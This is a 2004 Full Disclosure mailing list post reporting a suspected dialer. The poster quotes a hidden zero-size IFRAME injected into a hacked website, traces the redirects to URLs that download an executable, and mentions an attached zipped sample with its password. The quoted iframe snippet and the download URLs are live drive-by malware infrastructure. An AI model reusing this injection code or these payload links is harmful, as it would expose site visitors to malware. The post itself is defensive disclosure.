Full Disclosure mailing list archives

Possible dialer on 62.4.84.150

From: "Daniel Bartlett" <danbuk_fd () warpmail net>
Date: Tue, 17 Aug 2004 19:47:03 +0100

Hi All,
I've only looked at this for about 3 mins, so there isn't a lot to tell.

From a website that looks like someone has hacked it and added a IFRAME

to the top of the page:
<iframe FRAMEBORDER="0" width="0" height="0"
src="http://213.158.119.103/iframe.php?xid=111";></iframe>

From this frame it gets bounced onto:

http://62.4.84.150/data/start.php?id=111-b&aid=0
then onto:
http://62.4.84.150/data/start.php?id=111-download&aid=0
which then downloads a 17984b exe file.
I've attached a strings output from the exe, and a copy of the
exe(password for zip is lamedial).

I hope someone else can shead more light on this than I can.

Cheers,
Daniel B.
-- 
  Daniel Bartlett
  danbuk_fd () warpmail net

Attachment: lamedial.zip
Description:

Attachment: lamedial-strings.txt
Description:

Current thread:

Possible dialer on 62.4.84.150 Daniel Bartlett (Aug 17)
- RE: Possible dialer on 62.4.84.150 Aditya, ALD [Aditya Lalit Deshmukh] (Aug 21)